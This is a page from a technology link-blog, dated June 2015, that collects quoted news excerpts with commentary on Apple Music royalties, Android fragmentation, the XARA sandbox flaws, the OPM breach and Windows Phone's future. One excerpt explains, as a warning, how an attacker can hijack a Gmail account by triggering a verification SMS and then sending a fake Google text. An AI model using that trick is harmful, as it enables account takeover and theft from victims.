About charlesarthur

Freelance journalist - technology, science, and so on. Author of "Digital Wars: Apple, Google, Microsoft and the battle for the internet".

Start up: tracking Android, the 1998 software warning, Google’s revenge porn move, VUT Swift?, and more

Posted on June 23, 2015 by charlesarthur

Another micropayment from Amazon! Photo by Amanda Emilio on Flickr.

A selection of 8 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

Android Tracker » Fiksu

In contrast to the iOS industry statistics, the Android landscape is much more fragmented, with dozens of manufacturers and thousands of devices on the market. We’ve put together four charts to help illuminate the situation:

• Android Tablet vs. Phone Usage
• Android Version Monitor
• Top Android Manufacturers
• Top Android Phones
• Top Android Tablets

The one for phone manufacturers is eye-opening, to say the least. Worth bookmarking. (Via Daniel Tello.)

BlackBerry’s Classic moment, or not » WSJ

Spencer Jakab:

Two things could leave the market pleasantly surprised on Tuesday. One would be an announcement that BlackBerry is distancing itself from handsets, devoting more resources to software. The other would be if that latter business shows signs of meeting some ambitious revenue targets laid out by chief executive John Chen.

A hopeful sign on software sales would affect the share price far more than if BlackBerry’s loss for the period through May was better than the 5 cents a share projected by analysts. They see BlackBerry reporting software and support revenue of $83m for the quarter, up from $56m a year earlier. The company wants to more than double the annual figure in fiscal 2016 to $500m and to produce operating profits on a sustained basis. That would come as services revenue continues to shrivel, falling by about half this fiscal year.

I’ll post my own forecast for BlackBerry’s results an hour or two after this post goes live. (These days people write about BlackBerry almost as a curio; it’s the Crimea of the smartphone wars.)

Launch of the new Companies House public beta service » GOV.UK

In line with the government’s commitment to free data, Companies House is pleased to announce that all public digital data held on the UK register of companies is now accessible free of charge, on its new public beta search service.

This provides access to over 170 million digital records on companies and directors including financial accounts, company filings and details on directors and secretaries throughout the life of the company.

Free access to the data is available both through a web service and an application program interface (API), enabling both consumers and technology providers to access real time updates on companies.

Fabulous. Back in 2006, the pricing was opaque and redacted.

These hackers warned the Internet would become a security disaster. Nobody listened. » The Washington Post

Craig Timberg:

Your computers, they told the panel of senators in May 1998, are not safe — not the software, not the hardware, not the networks that link them together. The companies that build these things don’t care, the hackers continued, and they have no reason to care because failure costs them nothing. And the federal government has neither the skill nor the will to do anything about it.

“If you’re looking for computer security, then the Internet is not the place to be,” said Mudge, then 27 and looking like a biblical prophet with long brown hair flowing past his shoulders. The Internet itself, he added, could be taken down “by any of the seven individuals seated before you” with 30 minutes of well-choreographed keystrokes.

The senators — a bipartisan group including John Glenn, Joseph I. Lieberman and Fred D. Thompson — nodded gravely, making clear that they understood the gravity of the situation. “We’re going to have to do something about it,” Thompson said.

What happened instead was a tragedy of missed opportunity, and 17 years later the world is still paying the price in rampant insecurity.

“Revenge porn” and search » Google Public Policy Blog

Amit Singhal, Google Search SVP:

We’ve heard many troubling stories of “revenge porn”: an ex-partner seeking to publicly humiliate a person by posting private images of them, or hackers stealing and distributing images from victims’ accounts. Some images even end up on “sextortion” sites that force people to pay to have their images removed.

Our philosophy has always been that Search should reflect the whole web. But revenge porn images are intensely personal and emotionally damaging, and serve only to degrade the victims—predominantly women. So going forward, we’ll honor requests from people to remove nude or sexually explicit images shared without their consent from Google Search results. This is a narrow and limited policy, similar to how we treat removal requests for other highly sensitive personal information, such as bank account numbers and signatures, that may surface in our search results.

In the coming weeks we’ll put up a web form people can use to submit these requests to us, and we’ll update this blog post with the link.

You could almost call it a “right to be forgotten” or “right to be delinked”. Let’s see – person requests that information about them which is irrelevant asks to have those pages removed from search. Which are we talking about, Europe or revenge porn?

Amazon’s new plan to pay authors every time someone turns a page » The Atlantic

Peter Wayner:

Soon, the maker of the Kindle is going to flip the formula used for reimbursing some of the authors who depend on it for sales. Instead of paying these authors by the book, Amazon will soon start paying authors based on how many pages are read—not how many pages are downloaded, but how many pages are displayed on the screen long enough to be parsed. So much for the old publishing-industry cliche that it doesn’t matter how many people read your book, only how many buy it.

For the many authors who publish directly through Amazon, the new model could warp the priorities of writing: A system with per-page payouts is a system that rewards cliffhangers and mysteries across all genres. It rewards anything that keeps people hooked, even if that means putting less of an emphasis on nuance and complexity.

So, basically, book streaming? Is Taylor Swift going to come to their aid? Or is it just an encouragement to write books at a length that people want to read? I think every author would like to know where people gave up on their books, if they didn’t finish them. Though that might not be the point at which they stopped being interested.

An Open Letter To Apple » German Association of Independent Music Companies

From 18 June, ie two days before Taylor Swift’s similar open letter:

Your plan not to compensate independent labels during the three-month trial period leads to the assumption that you don´t respect the music of independent artists or the work their partners do. It is obvious that this will reduce the overall income for independent artists and labels significantly at a time when many depend on every cent for survival.

Clearly what VUT needed was to rename itself “Taylor Swifte” or something. Or perhaps this was just another outgrowth of the ire felt among independent musicians. Apple Music (or more accurately the move to streaming and away from downloads) is going to cause yet another earthquake in the industry, rather like when CDs stopped being big.

Samsung’s mobile OS dilemma » Monday Note

Jean-Louis Gassée:

When we look at what it would take for Samsung to come up with its own mobile OS, the first thing to note is that “operating system” is a misnomer. Surely, iOS and Android are operating systems in the old-school “kernel” sense: They manage drivers, memory, input and output streams, user tasks, and the like. But today, an “operating system” is much more than just a kernel, it includes rich frameworks that support a wide range of applications, games, maps, social networking, productivity, drawing… Building these frameworks is a much harder task than adapting a Linux kernel.

And the OS is just the beginning. What Samsung really wants is its own ecosystem, a set of services that will ensure its autonomy, growth, and lasting importance. It wants its own app store, maps, music/video, cloud storage…

How long would it take for Samsung to build all of this? Three years, four years? Add to this the difficulty of “skating to where the puck will be”, to divine where the industry will land four years from now.

Samsung hasn’t been much good at building an ecosystem, either: look at all the content companies it has bought and then dumped, or services (ChatOn) it has started and stopped.

Start up: Swift v Apple, Beats gets heft, Aibos’ mortality, why Upworthy pivoted, and more

Posted on June 22, 2015 by charlesarthur

A number will get you into many peoples’ emails. Photo by Kohei314 on Flickr.

A selection of 10 links for you. I mean, do you even? I’m charlesarthur on Twitter. Observations and links welcome.

To Apple, love Taylor » Taylor Swift

Taylor Swift (yup, her):

I’m sure you are aware that Apple Music will be offering a free 3 month trial to anyone who signs up for the service. I’m not sure you know that Apple Music will not be paying writers, producers, or artists for those three months. I find it to be shocking, disappointing, and completely unlike this historically progressive and generous company.

This is not about me. Thankfully I am on my fifth album and can support myself, my band, crew, and entire management team by playing live shows. This is about the new artist or band that has just released their first single and will not be paid for its success. This is about the young songwriter who just got his or her first cut and thought that the royalties from that would get them out of debt.

This looks like an obvious one, but it isn’t. Lots of streaming services (all of them?) offer a free month initially, and the evidence suggests they don’t pay artists for those streams. (I’ve yet to confirm that absolutely.) Apple’s three-month deal seems to have come at the cost of higher royalty rates for those who sign up.

So Taylor Swift may be completely right – but that new artist or band might just want the exposure. It would certainly be good if Apple did pay in those three months. But that might then fall foul of antitrust.

Update: oh, internet, you do move fast. At 4.29am Eddy Cue tweeted that Apple would after all pay. More detail by Peter Kafka.

How It’s Made series: Beats By Dre » Medium

Avery Louie:

One of the great things about the [Beats] solo headphones is how substantial they feel. A little bit of weight makes the product feel solid, durable, and valuable. One way to do this cheaply is to make some components out of metal in order to add weight. In these headphones, 30% of the weight comes from four tiny metal parts that are there for the sole purpose of adding weight.

The two larger parts are cast zinc. Cast parts are similar to injection molded parts in that there is a tooling cost and a per-part cost. Compared to injection molding, the tool is marginally more expensive, but the per-part costs are higher, and the tools do not last as long.

The brilliant thing here is that the two large metal parts are not mirror images of each other- they are actually the same part!

The parts give them heft. And do nothing else at all.

How to hack into an email account, with just your victim’s mobile number » Graham Cluley

A bad guy – let’s call him Malcolm – is keen to break into Alice’s account, but doesn’t know her password. However, he does know Alice’s email address and phone number.

So, he visits the Gmail login page and enters Alice’s email address. But Malcolm cannot correctly enter Alice’s password of course (because he doesn’t know it).

So instead he clicks on the “Need help?” link, normally used by legitimate users who have forgotten their passwords.

Rather than choosing one of the other options, Malcolm selects “Get a verification code on my phone: [mobile phone number]” to have an SMS message containing six digit security code sent to Alice’s mobile phone.

This where things get sneaky.

Because at this point, Malcolm sends Alice a text pretending to be Google.

This is very sneaky, and would probably work against lots of people. Beware.

A robotic dog’s mortality » The New York Times

Jonathan Soble on the death of the Aibo – which is running out of juice:

They didn’t shed, chew the sofa or bite the postman, but for thousands of people Sony’s Aibo robotic dog was the closest thing to a real canine companion. So when the Japanese company stopped servicing the robots last year, eight years after it ended production, owners faced a wrenching prospect: that their aging “pets” would break down for good.

Sony introduced the Aibo in 1999, at a price of 250,000 yen (about $2,000 at current exchange rates). The beaglelike robots could move around, bark and perform simple tricks. Sony sold 150,000 units through 2006; the fifth and final generation was said to be able to express 60 emotional states.

Platform Patched – The Awl

John Herrman with a great analysis of why Upworthy has been forced to pivot: because Facebook turned its unique selling point into a feature of the platform:

Upworthy was succeeding according to metrics favored by Facebook, but not necessarily by doing the things Facebook believed those metrics would cultivate. A reader might spend five minutes watching a video on Upworthy and leave satisfied, but the site neither created the video nor hosts it—it would have been created by yet another party and hosted on YouTube, a site owned by Google. For Facebook, this is fine but not optimal: Why not just embed the YouTube video directly into News Feed with the same headline and description? Better yet, why not just host the video directly on Facebook?

Facebook-native video took off with the Ice Bucket Challenge, the success of which Facebook summarized in August and later used in explaining its vision for video. Seeing opportunity, publishers started publishing more videos, and more professional videos, as soon as they could.

And here’s The Awl’s graphic of Upworthy traffic:
Upworthy's falling traffic

1Password inter-process communication: a discussion » Agile blog

Jeff Goldberg, in a long blogpost about the “malicious OSX apps could grab inter-app comms by registering to receive them first” vulnerability:

Neither we nor Luyi Xing and his team have been able to figure out a completely reliable way to solve this problem. We thank them for their help and suggestions during these discussions. But, although there is no perfect solution, there are things that can be done to make such attacks more difficult.

The blogpost goes into a lot more detail; this is a really tricky problem. Though “keep process running all the time in the background” turns out to be a good solution.

Analyzing 10 yrs (and 5TB) of OpenStreetMap » Mapsense

Many fun insights to be found, but this one will ring true for any crowdsourced effort:

Insight #3- Very few people contribute the vast majority of features

We know the OSM community is growing, but we wanted to know what the impact of that growth is on the map that we all use.

We segmented users into the top 5% of committers and the bottom 95%. Here’s how their edits compare:

The number of commits in the bottom 95% is growing nicely over time, but even at its peak, their commits are orders of magnitude fewer than the commits of the top 5%. These power users are incredibly prolific, often importing large swathes of data such as building outlines or roads.

These users are making a huge impact on OSM- how can we encourage more of this to accelerate OSM’s quality?

Apple vs. Samsung: Samsung asks court to reconsider appeal » San Jose Mercury News

Howard Mintz:

Samsung urged the U.S. Federal Circuit Court of Appeals to rehear the case with its full 12-judge roster, arguing that a three-judge panel erred earlier this year when it left intact a jury’s verdict that the South Korean tech giant’s smartphones and tablets infringed on Apple’s design patents.

That part of the verdict – which has been pared from an original judgment of $1bn – accounts for about $400m of the $548m in damages Samsung still must pay Apple from their first trial.

Samsung’s continued interventions make this now officially the most boring court case in history. (Thanks John Molloy for the link.)

UK private copyright exception ‘unlawful’, rules High Court » Out-law

Prior to introducing the private copying exception, the UK government argued that it did not believe the private copying exception would result in lost sales for rights holders. However, the new regime was challenged by music industry bodies. The British Academy of Songwriters, Composers and Authors (BASCA), the Musicians’ Union (MU) and UK Music claimed that the government should have to compensate them and other rights holders for the harm caused to them by the new exception.

Mr Justice Green said that that the UK government was entitled to “implement a private usage exception” and to define the scope of that right. He said, though, that the government was obliged to introduce a “compensation mechanism” for rights holders if the harm caused to them by the introduction of the private copying exception was above a “de minimis level”.

Here’s the judgement. Not sure how this is going to be implemented – a surcharge on systems that can rip CDs? It’s the very definition of shutting the stable door after the horse has bolted, moved to another town, brought up foals, and died peacefully in its sleep.

Sizing up the suitors for Here, Nokia’s map business » TechCrunch

Ingrid Lunden:

One former longtime senior employee of Here estimates there are around 300 different location attributes, with corresponding historical databases, that can be tracked using Here’s technology. They include more obvious mapping and location-based applications such as driving directions and street maps, but also spatial data technology used in video and gaming applications.

“It’s incredibly difficult to get the type of mapping data that Here has. Base geometry and 20-40 road attributes are relatively easy to collect. However, to collect the 250+ attributes needed for the best navigation experience requires a combination of field teams and user-generated content,” notes entrepreneur Kurt Uhlir.

“Here has proprietary collection hardware and software that is unmatched, even by Google. Plus, they have the most extensive patent portfolio covering collecting and creating spatial content for current generation of maps and dynamic data. Here also has the foundational patents covering usage of spatial data for creating video games, movie content and the upcoming ADAS vehicle applications.”

Unmatched even by Google? Protected by patents? Such talk is heresy.

Start up: Lightning at Twitter, academic publishers strangle libraries, that iOS/OSX hack explained, and more

Posted on June 19, 2015 by charlesarthur

Do you recognise this person? Photo by Tim Dorr on Flickr.

A selection of 8 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

New smart home gadget called ELLA Assistant wants you to put down your phone » Tech In Asia

Steven Millward:

The startup team, which is based in Shanghai, sees it being used for things like telling you that you should take an umbrella, reminding you that you’re running late to an appointment, or for turning off all your smart lights at once. With a single press, it could alert your significant other that you’re leaving the house.

All that will depend on it working nicely with the brand of smart lights that you have, or syncing with the online calendar service that you use. The fact that the ELLA Assistant is subservient to your phone and other smart gadgets means it has to work with them all with ease, or it won’t gain favor with consumers. War tells Tech in Asia that the team will add support for various things as demand arises, but there are no specific supported devices or services listed yet – which is because the little gizmo hasn’t even launched. Once it’s out, it’ll have its own app store.

The ELLA Assistant will hit Kickstarter some time in August.

Hmm. Don’t think so, somehow.

This is Twitter’s top secret Project Lightning » BuzzFeed News

Mat Honan:

Project Lightning will bring event-based curated content to the Twitter platform, complete with immersive and instant-load photos and videos and the ability to embed those experiences across the Web — and even in other apps.

“It’s a brand-new way to look at tweets,” says Kevin Weil, who runs product for the company. “This is a bold change, not evolutionary.”

It is also still a few months out, and things could change. But here’s how it will work.

On Twitter’s mobile app, there will be a new button in the center of the home row. Press it and you’ll be taken to a screen that will show various events taking place that people are tweeting about. These could be based on prescheduled events like Coachella, the Grammys, or the NBA Finals. But they might also focus on breaking news and ongoing events, like the Nepalese earthquake or Ferguson, Missouri. Essentially, if it’s an event that a lot of people are tweeting about, Twitter could create an experience around it.

This likely comes out of the machine-intelligence-curated tweet streams from a company that Twitter just bought – under Costolo’s leadership, don’t forget. He just took too long to do it. (By the way, in future could “top secret” – used in the headline – please be reserved for things that actually are top secret, such as the content of the Snowden documents, and not PR-led product demos by the CEO?)

Academic publishers reap huge profits as libraries go broke » CBC News

Researchers rely on journals to keep up with the developments in their field. Most of the time, they access the journals online through subscriptions purchased by university libraries. But universities are having a hard time affording the soaring subscriptions, which are bundled so that universities effectively must pay for hundreds of journals they don’t want in order to get the ones they do.

Larivière says the cost of the University of Montreal’s journal subscriptions is now more than $7m a year – ultimately paid for by the taxpayers and students who fund most of the university’s budget. Unable to afford the annual increases, the university has started cutting subscriptions, angering researchers.

“The big problem is that libraries or institutions that produce knowledge don’t have the budget anymore to pay for [access to] what they produce,” Larivière said.

“They could have closed one library a year to continue to pay for the journals, but then in twenty-something years, we would have had no libraries anymore, and we would still be stuck with having to pay the annual increase in subscriptions.”

The kicker: the five largest academic publishers produce 53% of scientific papers in natural and medical sciences – up from 20% in 1973. Consolidation and monopoly.

EFF and eight other privacy organizations back out of NTIA face recognition multi-stakeholder process » Electronic Frontier Foundation

Jennifer Lynch:

Despite the sensitivity of face recognition data, however, the federal government and state and local law enforcement agencies continue to build ever-larger face recognition databases. Last year the FBI rolled out its NGI biometric database with 14-million face images, and we learned through a Freedom of Information Act (FOIA) request that it plans to increase that number to 52-million images by this year. Communities such as San Diego, California are using mobile biometric readers to take pictures of people on the street or in their homes and immediately identify them and enroll them in face recognition databases. These databases are shared widely, and there are few, if any, meaningful limits on access.

EFF has been especially concerned about commercial use of face recognition because of the possibility that the data collected will be shared with law enforcement and the federal government. Several years ago, in response to a FOIA request, we learned the FBI’s standard warrant to social media companies like Facebook seeks copies of all images you upload, along with all images you’re tagged in. In the future, we may see the FBI seeking access to the underlying face recognition data instead.

Huh. The FBI does that, does it?

Apple criticised over ‘presumptuous’ news app email » BBC News

Kevin Rawlinson:

According to Graham Hann, the head of technology, media and communications at the law firm Taylor Wessing, the terms of the deal are broadly in line with industry standards – except the requirement to opt out.

“The content of the notice is not unusual, although it has deliberately been dumbed down, possibly for clarity,” he told the BBC.

“However, the optout approach is very unusual and I don’t see how the notice could form a binding contract without a positive reply.

“Apple clearly wants to launch with as much content as possible and has taken this risk-based approach. Some publishers may object and even threaten to sue.

“However, I think it would be hard to claim damage beyond a reasonable royalty fee.”

Soooo… it’s not actually a big deal?

Internet TV boxes: Nvidia pips Google for Android » FT.com

Tim Bradshaw:

while [Android TV] mostly got the dictation right, it often failed to produce the results I was looking for. Asking for Breaking Bad brought up detailed information about the show and its actors, but no way to watch it. This query also produced a link to Pomodoro Wear, a countdown timer app shaped like a tomato and designed for Google’s Android Wear smartwatch platform.

Even Google itself does not seem to know quite how to use Android TV. Its marketing materials suggest asking for “romantic comedies set in New York”. But when I tried that on the Android TV itself, it produced only a list of YouTube videos, the first of which was about Lego sets from a New York toy fair. With no When Harry Met Sally or Manhattan to be found, I can only wonder whether anyone else — including Google’s own staff — has ever searched for something to watch this way.

Bear in mind that Apple experimented with the same voice dictation system for TV and, by the account in the WSJ, abandoned it.

XARA exploits on Mac, iPhone, and iPad, and what you need to know » iMore

Rene Ritchie with a series of Q+As on the vulnerability disclosed yesterday:

Q: So were the App Stores or app review tricked into letting these malicious apps in?

A: The iOS App Store was not. Any app can register a URL scheme. There’s nothing unusual about that, and hence nothing to be “caught” by the App Store review.

For the App Stores in general, much of the review process relies on identifying known bad behavior. If any part of, or all of, the XARA exploits can be reliably detected through static analysis or manual inspection, it’s likely those checks will be added to the review processes to prevent the same exploits from getting through in the future

Apparently apps now have to state the URL schemes they will use in plaintext in a .plist file; that’s easy to review, and Apple can easily spot duplicates by static testing. Security researchers suggest Apple probably began adding such tests when it was told about the weakness – so this is perhaps already “fixed” in the simplest way it can be. (Checking plist files can be done retrospectively too.)

How useful will Google Now be? » Naofumi Kagami

With Google announcing Google Now on Tap at Google I/O 2015 and Apple announcing Proactive at WWDC 2015, there is now a lot of discussion on how useful these predictive personal assistants will be. In particular, there is a lot of discussion on how much data these personal assistants will need to collect about you, and whether these assistants need to send this data to be analysed in the cloud.

The problem I have with these arguments is that they do not go into specifics. Instead of say “everything is going to be cool”, we should be having a detailed discussion of how each predictive recommendation is actually made, and whether each recommendation could be performed easily on your local device, or whether it needs to be done in the cloud.

I think Kagami’s question is really “What things need to be in the cloud for predictive analysis to work?” You could argue that traffic or transit news needs to be analysed in the cloud (a la Google) so it can warn you about delays; but on the other hand, an Apple device could pull that data from the cloud, and look at what’s in your device, and warn you too.

So the quest goes on.

Start up: Apple’s hacker flaw, Downing St’s FOI oddity, machines that parse art, and more

Posted on June 18, 2015 by charlesarthur

“You mean all we need to do to defeat him is adopt HTML5? Why didn’t you say?” Photo by Tom Simpson on Flickr.

A selection of 8 links for you. Uninflammable. I’m charlesarthur on Twitter. Observations and links welcome.

Encryption “would not have helped” at OPM, says DHS official » Ars Technica

Sean Gallagher:

pressed on why systems had not been protected with encryption prior to the recent discovery of an intrusion that gave attackers access to sensitive data on millions of government employees and government contractors, [US Office of Personnel Management Katherine Archuleta] said, “It is not feasible to implement on networks that are too old.” She added that the agency is now working to encrypt data within its networks.

But even if the systems had been encrypted, it likely wouldn’t have mattered. Department of Homeland Security Assistant Secretary for Cybersecurity Dr. Andy Ozment testified that encryption would “not have helped in this case” because the attackers had gained valid user credentials to the systems that they attacked—likely through social engineering. And because of the lack of multifactor authentication on these systems, the attackers would have been able to use those credentials at will to access systems from within and potentially even from outside the network…

…nearly every question of substance about the breach—which systems were affected, how many individuals’ data was exposed, what type of data was accessed, and the potential security implications of that data—was deferred by Archuleta on the grounds that the information was classified. What wasn’t classified was OPM’s horrible track record on security, which dates back at least to the George W. Bush administration—if not further.

Serious OS X and iOS flaws let hackers steal keychain, 1Password contents » Ars Technica

Dan Goodin:

The malicious proof-of-concept apps were approved by the Apple Store, which requires all qualifying submissions to treat every other app as untrusted. Despite the supposed vetting by Apple engineers, the researchers’ apps were able to bypass sandboxing protections that are supposed to prevent one app from accessing the credentials, contacts, and other resources belonging to another app. Like Linux, Android, Windows, and most other mainstream OSes, OS X and iOS strictly limit app access for the purpose of protecting them against malware. The success of the researchers’ cross-app resource access—or XARA—attacks, raises troubling doubts about those assurances on the widely used Apple platforms.

“The consequences are dire,” they wrote in a research paper titled Unauthorized Cross-App Resource Access on MAC OS X and iOS. “For example, on the latest Mac OS X 10.10.3, our sandboxed app successfully retrieved from the system’s keychain the passwords and secret tokens of iCloud, email and all kinds of social networks stored there by the system app Internet Accounts, and bank and Gmail passwords from Google Chrome.”…

…It’s not the first time researchers have found flaws in application sandboxes. The attack exploiting WebSocket weaknesses, for instance, can also succeed in Windows under certain conditions, the researchers said. Interestingly, they said application sandboxing in Google’s Android OS was much better at withstanding XARA threats.

For the time being, the researchers told Ars, there isn’t much end users can do except wait for Apple to fix the vulnerabilities.

Bad (though not deluge-of-malware bad; instead it’s sneaky-Trojan bad). Apple was told about this in October 2014. The best hope is that this is fixed in OS X 10.11 and iOS 9, but there’s no clear indication of how hard it is to fix.

Freedom of information turns into Mission Impossible for Downing St emails » FT.com

Jim Pickard and Kiran Stacey:

Emails sent from computers in Downing Street are automatically deleted within three months under a system that makes it harder for the public to obtain answers to “freedom of information” requests, former staff have disclosed.

The system, instigated a decade ago but not widely known about, means that messages are only held beyond that period if an individual saves them. It is widely blamed by government advisers for what one former employee called a sometimes “dysfunctional” operation at the heart of Whitehall.

The email system was introduced under the Labour government in late 2004, just weeks before January 2005 when the Freedom of Information Act belatedly came into force.

“The timing of this very strongly indicates that it was not a coincidence,” said Maurice Frankel, director of the UK Campaign for Freedom of Information.

Gee, ya think?

China and Russia almost definitely have the Snowden docs » WIRED

Bruce Schneier (who is a veritable security expert; if he says it, it’s true):

The vulnerability is not Snowden; it’s everyone who has access to the files.

First, the journalists working with the documents. I’ve handled some of the Snowden documents myself, and even though I’m a paranoid cryptographer, I know how difficult it is to maintain perfect security. It’s been open season on the computers of the journalists Snowden shared documents with since this story broke in July 2013. And while they have been taking extraordinary pains to secure those computers, it’s almost certainly not enough to keep out the world’s intelligence services…

…In general, it’s far easier to attack a network than it is to defend the same network. This isn’t a statement about willpower or budget; it’s how computer and network security work today. A former NSA deputy director recently said that if we were to score cyber the way we score soccer, the tally would be 462–456 twenty minutes into the game.

Even airgapped, never-connected computers can be attacked (don’t ask me how). The Guardian took extraordinary pains with its London copy: two people needed to enter passwords, at least two people needed to be present when documents were read, the computers used had never been online and had no connection.

But a simpler thought is this: if Snowden was one of 10,000 or so NSA staff with access to that data (and more in the UK), what are the chances that absolutely none of those has somehow been coerced or willingly turned over data to foreign powers? Pretty much zero.

Flash will soon be obsolete: it’s time for agencies to adapt » Advertising Age

David Evans on the fact that major browsers on desktop are hurrying to dump Flash:

If this sounds like a big problem to you, you’re absolutely right. If the major browsers were to disable Flash immediately, we could be looking at a scenario where roughly 84% of banners across the internet would not be viewable on desktop browsers. Rather than clicking on a visually dynamic, animated ad created to capture attention with movement and video, users would instead see a static banner in place of the intended ad, and most advertising creatives don’t pay much attention to the creation of static backups.

For advertisers, this could mean shelling out first-class money for economy-class impressions.
Though it might be painful to admit for an industry that has relied on Flash for over a decade, the right choice is to start creating desktop ads in the HTML5 language used to create ads for mobile.

This is a bit obvious to anyone who’s been paying attention for the past three years (minimum), but perhaps advertising has been looking somewhere else.

Market Monitor Q1 2015: LATAM smartphones grow 25% annually » Counterpoint Technology

Tina Lu:

LATAM is third, behind North America and Europe in the global ranking of smartphone shipment penetration.

• Except for Peru, majority of the key LATAM markets are seeing a significantly higher smartphone demand, with shipment penetration of total handsets between 77% and 99%.

• Overall feature phone demand has been declining, and so has been the overall scale and profitability of manufacturing and selling them. As a result, in countries like Argentina, due to government protectionist measures and import restrictions, vendors are manufacturing and selling only the more profitable smartphones. This has led to smartphone shipment penetration of sales to reach 99%; the highest in the region.

Here’s the shipment figure: Latam smartphone shipments Q1 2015

If you do the maths, on a 25% yoy growth both Samsung’s and LG’s shipments actually fell; Apple’s more than doubled. Alcatel and “Others” both grew faster than the market.

Apple’s Siri, Spotlight extend Google-like search inside iOS 9 apps, without tracking users » Apple Insider

Daniel Eran Dilger:

Because Apple is indexing in-app content for its search results, it can more easily suppress “Search Engine Optimization” malicious content or link spamming, as relevancy is tied to user engagement. If few users find a search result worthwhile, it can fade from relevance.

Many of the new search-related features Apple debuted for iOS 9 and OS X El Capitan bear a strong resemblance to some of predictive search features first introduced by Google starting back in 2012 as part of Android 4.1, branded as “Google Now.”

Since then, Google has introduced “app indexing,” a related feature designed to make the company’s web-style search more relevant to mobile users by delivering results that can open within local apps. For example, a recipe might open within a cookbook app, rather than just presenting the same information on a web page or dumping users into the app to find the recipe on their own.

The most profound difference between the two companies’ approach to in-app search is that Apple does not monetize its search with ads, and therefore has no need to capture and store users’ data and behaviors for future profiling, tied to a persistent user and device identifier that individuals can’t easily remove.

Apple is perhaps two years behind Google on this – but most people are using a version of Android that is at least two years old (87% are using 4.4, KitKat, from November 2013, or earlier). Which means that by November or so, Apple will roughly have parity on this feature.

Machine vision algorithm chooses the most creative paintings in history » MIT Technology Review

The job of distinguishing the most creative from the others falls to art historians. And it is no easy task. It requires, at the very least, an encyclopedic knowledge of the history of art. The historian must then spot novel features and be able to recognize similar features in future paintings to determine their influence.

Those are tricky tasks for a human and until recently, it would have been unimaginable that a computer could take them on. But today that changes thanks to the work of Ahmed Elgammal and Babak Saleh at Rutgers University in New Jersey, who say they have a machine that can do just this.

They’ve put it to work on a database of some 62,000 pictures of fine art paintings to determine those that are the most creative in history. The results provide a new way to explore the history of art and the role that creativity has played in it.

Can’t be long before someone puts a human art historian up against the machine to see who spots the fake. (By the way, there was no byline I could find on the story. Maybe a robot wrote it.)

Windows Phone: Microsoft’s really good reason to keep it going isn’t about phones

Posted on June 17, 2015 by charlesarthur

Important equations. Photo by the waving cat on Flickr.

The abrupt departure of Stephen Elop as leader of the hardware devices business at Microsoft, which will instead be united under Terry Myerson, creates a big, obvious question: is Microsoft about to kill the Lumia smartphone business that it bought from Nokia for $9bn?

Let’s go through the arguments for and against.

Kill it because: the Windows Phone business loses money hand over fist – no phone maker, including Nokia, has ever managed to make it profitable. My analysis of its financials suggests that in Q1 it was losing around $40 per handset even if you assumed that featurephones made zero profit. Even assuming a loss per featurephone, the calendar Q1 (fiscal Q3) figures still showed a $29 per handset loss, even with generous assumptions about marketing and ignoring goodwill writeoffs.

And Microsoft has warned that it’s going to take a whacking loss pretty soon on the phones division. The logical time to do that is at the end of the fiscal year – which is two weeks from now. Elop’s leaving just means the mess is already cleaned up when Satya Nadella goes on the analyst call.

Other handset makers simply won’t touch Windows Phone; they know they can’t make money from it. Huawei’s consumer marketing chief famously said last September that it wasn’t worth doing.

In addition, the number of Windows Phone users worldwide is really small in the context of the whole business. Out of more than 2 billion connected smartphone users, around 80m use Windows Phone – and the majority of those are using low-end versions.

Why do they primarily use low-end phones? Because they’re not worried about apps, and that’s fine, because Windows Phone hasn’t managed to attract app developers to any great extent – it’s very much a distant third (or even fourth) for development.

So Windows Phone has no momentum, is a money pit, and nobody’s interested in it – not the users or developers.

Now we come to the reasons to keep it.

Keep it because: Microsoft has to have a play in mobile because mobile is the biggest computing platform on the planet, bar none. Mobile is essential; if you aren’t in that, you simply aren’t in the game. True, Microsoft is writing software for rival platforms (sometimes before it does for Windows Phone itself) but to get any idea of the challenges and advances of what’s happening in the mobile world, you have to be a player yourself. Being exposed to the harsh vicissitudes of the market, and its demands, shows you what it is that people want and need much more immediately than if you’re trying to figure it out at second hand by observing Apple’s or Google’s manoeuvres with their operating systems.

Not only that, but mobile is an intermediate stepping stone between the desktop and the coming internet of things – which you could call sub-mobile. IoT depends on components that have become pervasive through their use in smartphones (GPS, accelerometers, camera sensors, fingerprint sensors, barometers…) and understanding how their capabilities interact, and fuse, and how their price points vary, is essential to seeing what the world is going to look like in five years’ time.

That’s what I see as a subtext in the announcement about the reorganisation of the “devices” side:

Executive Vice President Terry Myerson will lead a newly formed team, Windows and Devices Group (WDG), focused on enabling more personal computing experiences powered by the Windows ecosystem. This new team combines the engineering efforts of the current Operating Systems Group and Microsoft Devices Group.

“More personal computing experiences”? That’s “more personal” as in “closer to the person”, I think, rather than “more things that are PC”. (Update: to clarify, for those it isn’t clear to, I take that to mean things like Hololens – which relies heavily on accelerometers and real-time tracking and lens technology – and wearables. You don’t get much closer to the person than screens a few centimetres from your face and something that’s actually next to your skin.)

So what now?

Even to a Windows Phone sceptic like me (even though I really liked its interface when I first encountered it), it’s obvious that the second argument is by far the stronger one. It would be different if Microsoft couldn’t bear the cost of losses on Windows Phone (if it were, say, HTC), but the fact is that it can. It can bear those losses pretty much endlessly.

Logically, therefore, this is going to happen:
• Microsoft is going to announce a whacking loss on the phones business, which will be merged into the Devices business, at the end of this quarter
• the Lumia business will continue to tick over, functioning essentially as an R+D department for future IoT devices – note how Microsoft killed the proposed Nokia smartwatch in favour of its own Band
• Windows Phone will continue to sell poorly, and lose money, but it won’t matter. For Microsoft, mobile is now a lost battle; it’s moving on to the next thing. Are you ready for the platform battle of the internet of things?

Start up: Grexit to bitcoin?, Google’s antitrust deadline, Merkel’s suspect PC, Samsung security hole and more

Posted on June 17, 2015 by charlesarthur

Stockpiled – a bit like HTC’s unsold phones. Photo by .dh on Flickr.

A selection of 7 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

Bitcoin surges as Grexit worries mount, posts best run in 18 months » Reuters

Jemima Kelly:

Joshua Scigala, co-founder of Vaultoro.com, a firm that holds bitcoin for its customers and allows them to exchange it for gold and vice versa, said that Greeks were buying the currency as their trust in the authorities waned. It is also unclear what currency would be used if a Grexit does occur — another potential factor driving Greek demand for bitcoin.

“Some people aren’t waiting for the government to figure out an exit plan and are doing it for themselves,” said Scigala.

